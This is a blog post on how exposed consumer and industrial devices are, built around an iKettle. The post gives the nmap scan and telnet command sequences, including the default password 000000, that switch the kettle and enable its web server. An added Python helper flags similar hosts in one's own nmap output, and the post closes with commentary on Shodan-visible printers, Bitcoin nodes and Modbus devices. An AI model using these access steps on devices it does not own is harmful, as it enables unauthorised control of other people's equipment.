Who Really Needs a Wi-fi Kettle?

Honestly. Who needs a Wi-fi Kettle? Who is so desperate for a cup of tea that they want to switch on their kettle on the way back home? Who can’t get off the couch, and switch the kettle on?

In the following example, I’ll show how easy it is to connect to a wi-fi kettle over a network connection. In this case, the wi-fi kettle has an IP address of 192.168.0.22. If we use nmap we see:

$ nmap 192.168.0.22
PORT STATE SERVICE
23/tcp open telnet
2000/tcp open cisco-sccp

We can then connect to port 2000:

$ telnet 192.168.0.22 2000
HELLOKETTLE
HELLOAPP

To switch the kettle on or off:

set sys output 0x4
set sys output 0x0

We can then connect to port 23 and enable the Web server. The password in this case is “000000”:

$ telnet 192.168.0.22 
AT+ Command Shell
Password: 000000
Login Successfully
AT+WEBS=1
AT+PMTF
AT+Z
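
For checking a network you administer, here is an added example (not code from the original post): a Python helper that reads nmap's normal output and flags hosts with the same pair of open ports as the kettle above, 23/tcp and 2000/tcp. The sample scan text and function names are constructed for illustration; note that `cisco-sccp` is only nmap's default name for port 2000, not an identification of the service behind it.

```python
import re

# Port pair the post shows on the kettle: telnet AT+ shell and the control port.
KETTLE_PORTS = {23, 2000}

# Constructed sample of nmap "normal" output (not a real scan).
SAMPLE_SCAN = """\
Nmap scan report for 192.168.0.10
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http

Nmap scan report for 192.168.0.22
PORT     STATE SERVICE
23/tcp   open  telnet
2000/tcp open  cisco-sccp

Nmap scan report for printer.lan (192.168.0.30)
PORT     STATE  SERVICE
23/tcp   closed telnet
2000/tcp open   cisco-sccp
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9.]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\S+)\s+(\S+)")

def open_ports_by_host(scan_text):
    """Return {host_ip: {port: service_label}} for ports in state 'open'."""
    hosts, current = {}, None
    for line in scan_text.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            current = hosts.setdefault(m.group(1), {})
            continue
        m = PORT_RE.match(line.strip())
        if m and current is not None and m.group(2) == "open":
            current[int(m.group(1))] = m.group(3)
    return hosts

def kettle_like_hosts(scan_text):
    """Hosts exposing every port in KETTLE_PORTS; candidates for manual review."""
    return sorted(ip for ip, ports in open_ports_by_host(scan_text).items()
                  if KETTLE_PORTS.issubset(ports))

if __name__ == "__main__":
    for ip in kettle_like_hosts(SAMPLE_SCAN):
        print(f"{ip}: telnet and port 2000 both open; check for default credentials")
```

The same functions work on a file written with `nmap -oN` once its contents are read into a string.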

But surely no one would put their kettle on the Internet? Well, with Shodan it’s not too difficult to find out, as we can quickly scan for the iKettle protocol [here]:

Though, someone needs to tell them that their kettle is boiling (100 C).

But, you say …

That’s a kettle, surely my organisation wouldn’t have a kettle on-line!

But what about all those printer queues that are set up in your organisation: can they be seen? Well, currently, there are over 175,000 of those queues ready to be connected to across the Internet:

and over 30,000 HP LaserJets just ready to be discovered:

But you say:

“At least my Bitcoins are safe!”

But are they? Shodan searches for information on the Bitcoin daemon, and any devices connected to it:

“But I feel safe that all our critical national infrastructure is secured and can’t be accessed by malicious agents”,

Well think again … the Modbus protocol allows devices to be controlled remotely. Here’s an example of a device in France:

And you say:

Well I’m off to get some fuel for my car, surely that’s secret!

Ooops:

And you say …

I’m switching off my Internet connection!